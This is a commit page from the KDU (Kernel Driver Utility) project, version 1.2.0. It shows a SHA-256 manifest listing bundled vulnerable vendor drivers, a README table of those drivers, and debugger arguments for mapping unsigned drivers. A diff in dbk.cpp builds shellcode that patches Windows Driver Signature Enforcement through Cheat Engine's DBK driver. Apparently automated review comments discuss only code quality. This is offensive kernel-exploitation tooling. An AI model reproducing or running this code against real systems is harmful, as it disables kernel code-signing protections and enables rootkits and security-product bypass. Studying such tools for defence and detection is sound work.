v 1.2.0
hfiref0x committed Feb 18, 2022
1 parent d7e0714 commit 8fc01fd
Showing 46 changed files with 396 additions and 388 deletions.
Binary file modified Bin/drv64.dll
Binary file not shown.
Binary file modified Bin/kdu.exe
Binary file not shown.
88 changes: 44 additions & 44 deletions KDU.sha256
@@ -1,7 +1,7 @@
7e405bf2a4c4b851e7665a37f5b0a791d04f48e9d40ee7a1063db27fb3898709 *Bin\drv64.dll
aaf2ee77582f78ca096c40c6005d83041b8b02b2a89e192ba0c1d419319b752d *Bin\drv64.dll
293cb9a86a3f89e377ef5c6716d70bbdfd9c57ff0a07d484bd8abc1f521e70cc *Bin\dummy.sys
82370b38b940f98013a6506a82c35913ec810f312d93b93b5406f3caf07bda9f *Bin\dummy2.sys
934202b339ecd88418ef2d31061e0ff39eba926907d5a55454dd2bf8de643c50 *Bin\kdu.exe
e18f904ea5a08e9465d6742254a4e67cd65a015924eb33cc9bf0e3da40bac852 *Bin\kdu.exe
751d35646474f1854972d6cc45c5b7419933e36fabe013eba785f276ec566d25 *Bin\license.txt
323d910f93683453d45239a0528d3c3cda7f2608fca864fd2a687184ffe129fe *Help\kdu1.png
a1d7a51549914833a3414a93646952c25deabe072d8a271b54e10727f923b479 *Help\kdu2.png
Expand Down Expand Up @@ -29,43 +29,43 @@ d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\Example
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\Examples\DummyDrv2\dummy\r3request.c
f12057a99c6b20abf6d9c3df949d794b124ca19b189498ce2beaa5beeb2b077c *Source\Hamakaze\compress.cpp
09fa3cdaa1416b81ba5ee304cf24897726902b9d33a76d879f604b7fe26b4dcc *Source\Hamakaze\compress.h
64b85353dd48547856d1c82af0f8d5bd3387a6599ec67303c64457d8610a9a41 *Source\Hamakaze\consts.h
0be929e99bfa8adafe9f1d54862dfe338d7b178c44807bec4498fca32351b1b4 *Source\Hamakaze\drvmap.cpp
51b0f3cf1352ca13d7ffd4a138082c0552ef29dbc33d72eec9a5ae9aa0ab055f *Source\Hamakaze\consts.h
b6f6af41d17270c3d0ed2dcced45397e37042a2aeff7d803a3eb38b4a242b34c *Source\Hamakaze\drvmap.cpp
2effbb4edc790ac57606a82d3755e26a5a9661884107f474bb3bdd2217bdc260 *Source\Hamakaze\drvmap.h
feabfafd122d6fa542c5113769828f0f44bd1c6c08c8f7731c770a18a41bd8d3 *Source\Hamakaze\dsefix.cpp
d46e3371c568c92493d4a2553327c9a703ccf0b68e26ccc9ed49772524e12b71 *Source\Hamakaze\dsefix.h
7f53d0a7cb3cbd7c63bbb101344bfce7e8498252e0e537c33c1079eb7dc1c63e *Source\Hamakaze\global.h
1e777eaa57e45768c4c318e8264ed5faa4941f56e93ba07456992daf7c8b982e *Source\Hamakaze\ipcsvc.cpp
95d701ca3e4c2ca744208d13e2c52e4956e983bcfcc8dbde45a1997509632244 *Source\Hamakaze\global.h
ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaze\ipcsvc.cpp
888a436b666b00592d29e8a2e82a9b5c7f0c1d4890aaab8cb2f623181ad07092 *Source\Hamakaze\ipcsvc.h
28852719cb7b5def5cb0667d9de9072f41ea3cd55ef92abf3697a32c487131b1 *Source\Hamakaze\KDU.vcxproj
dd85c4bc40199343726a2a82209713abd1fb41079d1721625d3cd96bc1b33ea6 *Source\Hamakaze\KDU.vcxproj.filters
694256006711a66f650b3a08f7cfc4c45c6fdbf7add49fecf611f5feba2a9f92 *Source\Hamakaze\KDU.vcxproj.user
996a662d691c6cfb46400ec8e75937b84ff160c993e4da0bc5061df9dff85097 *Source\Hamakaze\kduplist.h
1f2f1feb2e97594ad7f03fe82f4db3e69121816431e4579040113c8181b41297 *Source\Hamakaze\kduprov.cpp
19292faca56c6a99eae9869b2194ad768cea46b84e3d9216a6521818b6c0a072 *Source\Hamakaze\kduprov.h
131b328c68ab4fc99172051f3dfc0415431d5aade1b5167ab43e742bda76d885 *Source\Hamakaze\KDU.vcxproj.user
8126b55d26fac45bf920046d4d92c3a83c6075ce864d16f56c532473ff54b37d *Source\Hamakaze\kduplist.h
232d18e2cb1f2ba63a5d269fc315c151f2e592d3c6728aa87aa20d38467986c0 *Source\Hamakaze\kduprov.cpp
d4e42505f96cf1937ce09e2fc49cc27eaee13f16a05226d9e2b41c5d38005362 *Source\Hamakaze\kduprov.h
059074722ee621923d53e036452d24ba401cbed042fa36a896baff2c858f46ae *Source\Hamakaze\main.cpp
e1a8de39e2d3d0bae5d9bbe1b18e849f5d070feb1d37f838176ede5a401f35ec *Source\Hamakaze\pagewalk.cpp
545ecf7e669b6b28753a02e33fae6f503750d26cf0bf9089701f401fd24e0dd1 *Source\Hamakaze\pagewalk.h
c68451b1f7981eefd8ba6e79cb92bc11416c6e942d72bab83bc5096ac853dbd6 *Source\Hamakaze\ps.cpp
6c9e5a15f9d01db4b50ac06b723d4fe9468e2bb02eb8ba77c4bfecf8d83f1f8e *Source\Hamakaze\ps.h
6ab34cc400e37c37605e0b04b076f9464172c6e1ae749b19f7d0c73f2d7177e3 *Source\Hamakaze\resource.h
9816b5d056716f328ad8a13d8d5384dc47b51dbfe4d213abbca2feac6b4cc30c *Source\Hamakaze\resource.rc
6c8175868f7291676b0fe1704f3aff60f7fe2af765fe3ced6a568d182124f499 *Source\Hamakaze\shellcode.cpp
307c1a8c1e9cbc135f981f99859387af3fdd04c928c76654789086d7633ceed1 *Source\Hamakaze\shellcode.h
d9949a96d1fd3cb29ced81adecd840013c4f4ba29e59965de2ca28f0c9197b88 *Source\Hamakaze\shellcode.cpp
37b72edb872268e4e9f8a12853f4cbf726038cf7f0dc5e0f4239888818f18fed *Source\Hamakaze\shellcode.h
3d84a26f0de605c68a84c52bf21103dd90260a43a71dbd7e86f7e290b8fd49bc *Source\Hamakaze\sup.cpp
f85e934795129edb4dd106ab75f8038ccbb064d99ccdb38deb5a50bd839f9be6 *Source\Hamakaze\sup.h
f28306a5b655a37a664169d8a12ab08ac16d4c6521e97a2d8a01136a97cecab9 *Source\Hamakaze\tests.cpp
ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h
2f9bba7bf761a8e6908132ae93d81aaaa38cbdebd38e2557505ea6309bbd2391 *Source\Hamakaze\victim.cpp
b4165a29658b4770627aaac15bc36add0a47892d738920de1fc6ec73bb1c3cce *Source\Hamakaze\victim.h
329412146007b0520c3d24522768b46f0e0b4d067def7c851e6a0f20309b9624 *Source\Hamakaze\wdksup.h
ef4101bc7311ed538b61e9c3076445e57b03ef6bff731300c2fdb1f9a13cb76d *Source\Hamakaze\wdksup.h
31860c95db21761086e2979753e981d6435f27435dead3ed7e4687e99bb878d4 *Source\Hamakaze\hde\hde64.c
fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaze\hde\hde64.h
9d37519623d404987300d3f3258148ba9adddfe1bed5f89a0e9e47646819c9c7 *Source\Hamakaze\hde\pstdint.h
0b6c69ad498e67907e0c574ab06123aee4ec30c99fa181099ea929a8d820bfc1 *Source\Hamakaze\hde\table64.h
b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaze\idrv\atszio.cpp
015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
c5b615215ed900918986a1309e4d844535e27331246531c3307834cb388597b6 *Source\Hamakaze\idrv\dbk.cpp
5b3b4c565bb77549f6c34ac376a69dfdaa825966ae585fdbd48d022a89de9286 *Source\Hamakaze\idrv\dbk.cpp
24f81b4fdc1b924a36c981fb175b2dccebd7d029d6caed85fb731b74b22c7386 *Source\Hamakaze\idrv\dbk.h
f1e50ca998f4dde600b062fe0f89ba0289b5c69b5636608db95eeb753c444a2a *Source\Hamakaze\idrv\dbutil.cpp
ad955406989b80564e7e4cc400721e62d6d5c193e22037b075e07dd616f3c845 *Source\Hamakaze\idrv\dbutil.h
Expand Down Expand Up @@ -97,8 +97,8 @@ a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaz
3fd20249ff874011dbd7af8d30b9407b2dfcb2791e3e6cd0f9c5e5ddbb2baed1 *Source\Hamakaze\idrv\winring0.cpp
103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h
de7bdf0bd4acec31c963b916331399bce23c155e3002f0a8152a4a36af13faf8 *Source\Hamakaze\res\274.ico
f31b9db0c68cd0c4c53fac667e6bd8a1c547f26aee81ed7a9608192d36112543 *Source\Hamakaze\res\SB_SMBUS_SDK.bin
635fdddb536e7be089a3f813f4bb306e9c7220d05d5f19572f296d1c743f1411 *Source\Hamakaze\res\Taigei32.bin
7917b50bc2284aff2ba3a0cdce1a799b60cc89a979dae13d5095ea1c62749a86 *Source\Hamakaze\res\SB_SMBUS_SDK.bin
1a425764ea322118e15130d9f0f5160dc69d58c4adaecc0024abb8c2393f0fd3 *Source\Hamakaze\res\Taigei32.bin
1232f65b57bc8732ead29a730308f6c67bc53a2f9fafd47f8c7cc4b4f676a9e9 *Source\Hamakaze\utils\GenAsIo2Unlock.exe
e0ba365c8aa8e66fddd0f28bca4b827725911480fdcd968df2792c370f13ef42 *Source\Shared\ldr\ldr.cpp
37003367e625e218bf7e4c22850ac7d2efe926a6a832d29bc20a9f8b19a479af *Source\Shared\ldr\ldr.h
Expand Down Expand Up @@ -141,34 +141,34 @@ f0513a122c42de31a0341ab3d0f3d2940f777c91a7e096718d84c83b85a17f77 *Source\Tanikaz
a81e6f2ea101a6f4bd005530bd0d5fd475be1d6bba1e6f45821359cf4a6a09fb *Source\Tanikaze\Tanikaze.vcxproj
2cf945275de0ce48e3e4a438be16a9d27699c39dc15327f731d4e235a3bc265b *Source\Tanikaze\Tanikaze.vcxproj.filters
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Tanikaze\Tanikaze.vcxproj.user
e920037c5923d62b4da7c70df62d05a0e341ef19b9c26538de435ae5cec51cf3 *Source\Tanikaze\data\AsusCertService.bin
96835b758e88b9f8d7ec4a9449b32e99eab403c61aba65c13100c2ab63665db6 *Source\Tanikaze\data\dbutilcat.bin
db3ebc1c1aa2779adaedc21480e2ad78ae135a467ad78fa6d48a00575fc0e34c *Source\Tanikaze\data\dbutilinf.bin
ad5544f93b70690e66489bb6c584b28045ed892a2ea8f6149e3ed09dd36bf71b *Source\Tanikaze\data\KMUEXE.bin
a8df0de9fd2f304161038a353bce200fd27009f6bba5dee0eb433a55b9facc6c *Source\Tanikaze\data\KMUSIG.bin
8f37395f31486996e79b29f841efbb8a0b9580a4b24ef352a84b8e09d6e5d8ed *Source\Tanikaze\drv\asio2.bin
d2a3cab1c5acf6b2b45482d80fe78a46bf15ed22f17b088a832d6027f15afb67 *Source\Tanikaze\drv\AsIO3.bin
fa22f886bd2e3e835d009f32dd54e265b41e31e9a44beff66146756c3277c435 *Source\Tanikaze\drv\ATSZIO64.bin
e5459398bf19e711ea13a6289518b4f009557d15b5d0bd0131283e927f1eb8ab *Source\Tanikaze\drv\dbk64.bin
d2653463083e1d0e4ce1a7b3511e554150f1e555c63b13eb69dd9d4b641ee8f5 *Source\Tanikaze\drv\DbUtil2_3.bin
c76d7ab030a6a4265e732914cc730839b4ba3e80ca1050c90fb7721e835829d6 *Source\Tanikaze\drv\dbutildrv2.bin
513d816817728d08b67aee50eb236678e9920b5f2448cff73d75b79d0c96acad *Source\Tanikaze\drv\DirectIo64.bin
6e8b18e64613916bbbb6ff9e0f5a5f1c23d1dbdc84d20ea14e5395a6820a6bb0 *Source\Tanikaze\drv\ene2.bin
2bb48df5ea74f9e12f47cdda225f6cb48727f96d8a2635fa440efb5f58482897 *Source\Tanikaze\drv\EneIo64.bin
66a5b2c8e3b9a61e2b61ce7d37bc33b29684351507a5117f75634227abe044e3 *Source\Tanikaze\drv\EneTechIo64.bin
64d3864dfed46c709a38e3b1083fb715b172fdd9a7e060ff048b57686e2e058b *Source\Tanikaze\drv\gdrv.bin
de7a589bff3665d1a7421fc25806ff1f03538341c543a398f23572ebe5da1a85 *Source\Tanikaze\drv\GLCKIO2.bin
5b8e4905ccf9dea7145ed7bad350a43e8e2c81065b4cb1149a00354f67a15cb3 *Source\Tanikaze\drv\gmerdrv.bin
2c06022ab92311847255f8fcfff7863ab7d464fdc3ea19a943c5e53f87c94bad *Source\Tanikaze\drv\iQVM64.bin
88f31693190a9a50c357ba712bf398c3cffe09de5d64cc00552e7df34fffacc6 *Source\Tanikaze\drv\kprocesshacker.bin
67b46816becc08cdb853f3e2716ef8d8c1e2ff5ca794859b13bd6566735f53e4 *Source\Tanikaze\drv\lha.bin
bff22fa8afabc776a8078af2073ed560c14843654e6feb3133952721f7205e17 *Source\Tanikaze\drv\mimidrv.bin
1115bb6ba845bd4bbbd2b9388f687f164b9838a1dd3941c20cab5e84c36df264 *Source\Tanikaze\drv\MsIo64.bin
2d9d5a641599ad08f2c19125bc4f1976691e95c1a88da45388cd144aba1107bf *Source\Tanikaze\drv\Phymemx64.bin
661491b0c93d27b5960e26aff5c662cb2becec54303890b048e7465d33090178 *Source\Tanikaze\drv\procexp.bin
5c687b2022a107748cdb294dc2d4a478255f69f4bffeef0209803d37a49f6f8d *Source\Tanikaze\drv\RTCore64.bin
e9f5a09e105a05975709bd2ccabf50e5f1cedd2159d42e56f713aba7109bbba8 *Source\Tanikaze\drv\rtkio64.bin
60e15c039544ac6d2d96cbda97af8353c3a5b72d70947dd39add47c2ef91a32a *Source\Tanikaze\drv\WinRing0x64.bin
b394488390e9339e560abef540956fab554ade1418475d1f0b2fa53488e6c884 *Source\Tanikaze\data\AsusCertService.bin
4821448b16dc3280abdc2c2d0e9064c0a59653373594fb0b6f84c03a1504794e *Source\Tanikaze\data\dbutilcat.bin
f09ebf5aff449c68f99926cec4c3bfbcf1617dbdb36d1d3bcca83edb127b4abd *Source\Tanikaze\data\dbutilinf.bin
078bd47739dca4cd7bbee8d56594ea488e5ad3a1cbafe56e5f36c1380d7a396b *Source\Tanikaze\data\KMUEXE.bin
ae2ba42b0f0a10fa945ca7416f764cb8a1e7b52a85f125a020066879cfe93e7b *Source\Tanikaze\data\KMUSIG.bin
654c50b7404069baba71d82b8f21a2cf8dadb3b395641b4ecb0bda47bff05b36 *Source\Tanikaze\drv\asio2.bin
cc06d8e6d743d72cc42ed5bbba0a324c88adda4e3fd6c879a14f24c3ca7c9b1a *Source\Tanikaze\drv\AsIO3.bin
b54f5c1e66ddc4f8f8e98f4f6dff5d24ed7212cf362979436278879eb59a3bf2 *Source\Tanikaze\drv\ATSZIO64.bin
2ab1e575f572462e5e3b3020974978db04069ec267f620935efdbc7b04a67b61 *Source\Tanikaze\drv\dbk64.bin
ee145520e5ea98da0b479a73ad5ad1add995e94ea27a46b1a03364390af13943 *Source\Tanikaze\drv\DbUtil2_3.bin
d783c71d4521fe7df86f9474247aa125cf0bce81fa8822f6acacd17c3547aa23 *Source\Tanikaze\drv\dbutildrv2.bin
753a3d347f7055a704fe06fd112b2b6cfb643556596fbc173070ab412d9855e8 *Source\Tanikaze\drv\DirectIo64.bin
7d2c07e2d1cf9a2637940230c1527f7a71632df4da82ff7a9e6761a3756a4869 *Source\Tanikaze\drv\ene2.bin
f50f906d75eb44129dc3c07ecfde9784f1a939fc8af9dd956e8b54aba7ace212 *Source\Tanikaze\drv\EneIo64.bin
bbc9a758a3ef464ab6a7aa2c9e4a03a34ecdc7ca1007d65484d72c2591d39ffc *Source\Tanikaze\drv\EneTechIo64.bin
ec1a22621f5b2be3a0077a546b22250c362c4e82e84c3edf8f6eb647c248efcc *Source\Tanikaze\drv\gdrv.bin
05ad3f90c6ef313b27c627f6004378bd8c95500b64536702504d9d43ebdc590a *Source\Tanikaze\drv\GLCKIO2.bin
d74c09f50f51915228f207e9d56412f607c5287d7d772a914c94e337f2af8ad0 *Source\Tanikaze\drv\gmerdrv.bin
59b78141995341b19dd9611b8c8224f6c52a7cdce0aed5e83a5c7d0bda0d0861 *Source\Tanikaze\drv\iQVM64.bin
4df9b08915ec1fff8730e96cd7672a4f7544962edc5bcfe9a8e08440f9db6b0a *Source\Tanikaze\drv\kprocesshacker.bin
fef2e03182d98598904e16154838e9a2580dab524c7179dc32e17f81ffdc867b *Source\Tanikaze\drv\lha.bin
8f6750747d721e51d91d1bba2d23631873adf07cec504b55a37585947b3db65c *Source\Tanikaze\drv\mimidrv.bin
40b689b5bbb6da0ed6f8c56eac5945d005314b93004aac39739b32fdda78b473 *Source\Tanikaze\drv\MsIo64.bin
e5e39880ad0162cc0c793ec52495a621a9811f118a2196d3607899368d243ff9 *Source\Tanikaze\drv\Phymemx64.bin
2974c05b4a43e4900d6185d82328fe1fa8700818b8e46ca49a25092a72627a18 *Source\Tanikaze\drv\procexp.bin
b9e53910ad1ea540c2a569f7b355fc390cf2a417ee4308a99829850d51eb5cf2 *Source\Tanikaze\drv\RTCore64.bin
ba8f9fca461a049d11488aff5ec5c606f74dc8648ae17063f249e93980e93823 *Source\Tanikaze\drv\rtkio64.bin
fc833f42ef6fa84bed9f9cabbfc90f700fc5245c8e2ef1fd397906d0c6227617 *Source\Tanikaze\drv\WinRing0x64.bin
bf86c929ee9ee2bb88187e1d82bcddfe83375c73e6787b83a7e414dff691e35b *Source\Utils\readme.txt
c776bc97ee2fbe48d3e148bb37c887862e6de212d4391d6df9b5f149e40ed223 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.sln
c4a28bc43a63a40ff2d8699fa261ee1ced6783d199043484ea7921e8d078ea08 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.vcxproj
2 changes: 1 addition & 1 deletion README.md
Expand Up @@ -119,7 +119,7 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
| 19 | Microsoft | ProcExp152 | Process Explorer | Original | 1.5.2 and below |
| 20 | Dell | DBUtilDrv2 | Dell BIOS Utility | Original | 2.7 and below |
| 21 | DarkByte | Dbk64 | Cheat Engine | Original | 7.4 and below |
| 22 | ASUSTeK | AsIO3 | ASUS GPU Tweak II / III | WINIO | 2.3.0.3 |
| 22 | ASUSTeK | AsIO3 | ASUS GPU Tweak II/III | WINIO | 2.3.0.3 |

More providers maybe added in the future.

4 changes: 2 additions & 2 deletions Source/Hamakaze/KDU.vcxproj.user
@@ -1,11 +1,11 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>-test</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>-prv 21 -scv 4 -map c:\makeexe\kdu\bin\dummy.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>-prv 21 -dse 6</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>-prv 22 -map c:\makeexe\kdu\bin\dummy.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>
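Review bot: Both `LocalDebuggerCommandArguments` values now embed an absolute path from one developer's machine, `c:\makeexe\kdu\bin\dummy.sys`, in a per-user settings file. Any other checkout gets debugger arguments that point at a file which may not exist, and the repository records a local directory layout it does not need. Build the path from an MSBuild macro such as `$(SolutionDir)`, or stop tracking the file and ignore `*.vcxproj.user`.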
2 changes: 1 addition & 1 deletion Source/Hamakaze/consts.h
Expand Up @@ -6,7 +6,7 @@
*
* VERSION: 1.20
*
* DATE: 10 Feb 2022
* DATE: 15 Feb 2022
*
* Global consts.
*
1 change: 1 addition & 0 deletions Source/Hamakaze/drvmap.cpp
Expand Up @@ -407,6 +407,7 @@ PVOID KDUSetupShellCode(
}

printf_s("[+] Ntoskrnl.exe mapped at 0x%llX\r\n", KernelImage);
Context->NtOsMappedBase = KernelImage;

//
// Prepare and store payload for later shellcode use.
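Review bot: The new assignment `Context->NtOsMappedBase = KernelImage;` in KDUSetupShellCode stores the mapped image base in the shared context, but nothing visible here says who releases that mapping or resets the field if a later step in this function fails. If any path after this line unloads the image, the context would keep a stale pointer, so the field should be cleared on that path or assigned only once setup has succeeded. A short comment at the assignment, for example `// NtOsMappedBase: mapped Ntoskrnl.exe image, released by <owner>`, would record the contract. The function body starts and ends outside the hunk, so the cleanup paths could not be checked from this page.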
2 changes: 1 addition & 1 deletion Source/Hamakaze/global.h
Expand Up @@ -6,7 +6,7 @@
*
* VERSION: 1.20
*
* DATE: 10 Feb 2022
* DATE: 15 Feb 2022
*
* Common include header file.
*
58 changes: 21 additions & 37 deletions Source/Hamakaze/idrv/dbk.cpp
Expand Up @@ -6,7 +6,7 @@
*
* VERSION: 1.20
*
* DATE: 14 Feb 2022
* DATE: 16 Feb 2022
*
* Cheat Engine's DBK driver routines.
*
Expand Down Expand Up @@ -36,7 +36,7 @@
#define DBK_SC_MAX_SIZE PAGE_SIZE
#define DBK_SHELLCODE_CI_PAYLOAD_SIZE DBK_SC_MAX_SIZE -\
DBK_INIT_CODE_SIZE - \
sizeof(PVOID) - \
sizeof(PULONG_PTR) - \
sizeof(ULONG_PTR)

typedef struct _DBK_SHELLCODE_CI {
Expand All @@ -62,7 +62,7 @@ VOID WINAPI DbkDsePatchRoutine(
}

/*
* DbkpBuildShellCode
* DbkpBuildShellCodeDsePatch
*
* Purpose:
*
Expand All @@ -76,6 +76,8 @@ BOOL DbkpBuildShellCodeDsePatch(
)
{
ULONG procSize, maxSize;
PVOID pvInitCode;
ULONG initSize = 0;

procSize = ScSizeOfProc((BYTE*)DbkDsePatchRoutine);
maxSize = DBK_SHELLCODE_CI_PAYLOAD_SIZE;
Expand All @@ -91,40 +93,22 @@ BOOL DbkpBuildShellCodeDsePatch(
#endif
}

memcpy(ShellCode->Payload, DbkDsePatchRoutine, procSize);

memset(ShellCode->InitCode, 0xCC, sizeof(DBK_INIT_CODE_SIZE));

// 00 call +5
// 05 pop rcx
// 06 sub rcx, 5
// 0A jmps 10
// 0B int 3
// 0C int 3
// 0D int 3
// 0E int 3
// 0F int 3
// 10 code

//call +5
ShellCode->InitCode[0x0] = 0xE8;
ShellCode->InitCode[0x1] = 0x00;
ShellCode->InitCode[0x2] = 0x00;
ShellCode->InitCode[0x3] = 0x00;
ShellCode->InitCode[0x4] = 0x00;

//pop rcx
ShellCode->InitCode[0x5] = 0x59;

//sub rcx, 5
ShellCode->InitCode[0x6] = 0x48;
ShellCode->InitCode[0x7] = 0x83;
ShellCode->InitCode[0x8] = 0xE9;
ShellCode->InitCode[0x9] = 0x05;

// jmps
ShellCode->InitCode[0xA] = 0xEB;
ShellCode->InitCode[0xB] = 0x04;
RtlCopyMemory(ShellCode->Payload, DbkDsePatchRoutine, procSize);
RtlFillMemory(ShellCode->InitCode, sizeof(ShellCode->InitCode), 0xCC);

pvInitCode = ScGetBootstrapLdr(KDU_SHELLCODE_V4, &initSize);

if (initSize > DBK_INIT_CODE_SIZE) {

supPrintfEvent(kduEventError,
"[!] Loader code size 0x%lX exceeds limit 0x%lX, abort\r\n",
initSize,
DBK_INIT_CODE_SIZE);

return FALSE;
}

RtlCopyMemory(ShellCode->InitCode, pvInitCode, initSize);

ShellCode->AddressOfVariable = (PULONG_PTR)Address;
ShellCode->ValueToWrite = Value;
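Review bot: In DbkpBuildShellCodeDsePatch the pointer returned by `ScGetBootstrapLdr(KDU_SHELLCODE_V4, &initSize)` goes straight into `RtlCopyMemory` with no NULL check; only the upper bound of `initSize` is tested. ScGetBootstrapLdr is not shown on this page, so it is an assumption that it can fail. If it returns NULL or leaves `initSize` at 0, the function carries on with an `InitCode` area that holds only the 0xCC fill. Widening the guard to `if (pvInitCode == NULL || initSize == 0 || initSize > DBK_INIT_CODE_SIZE)` makes the builder fail closed instead of producing a buffer with no loader stub. The function body starts and ends outside the visible hunks.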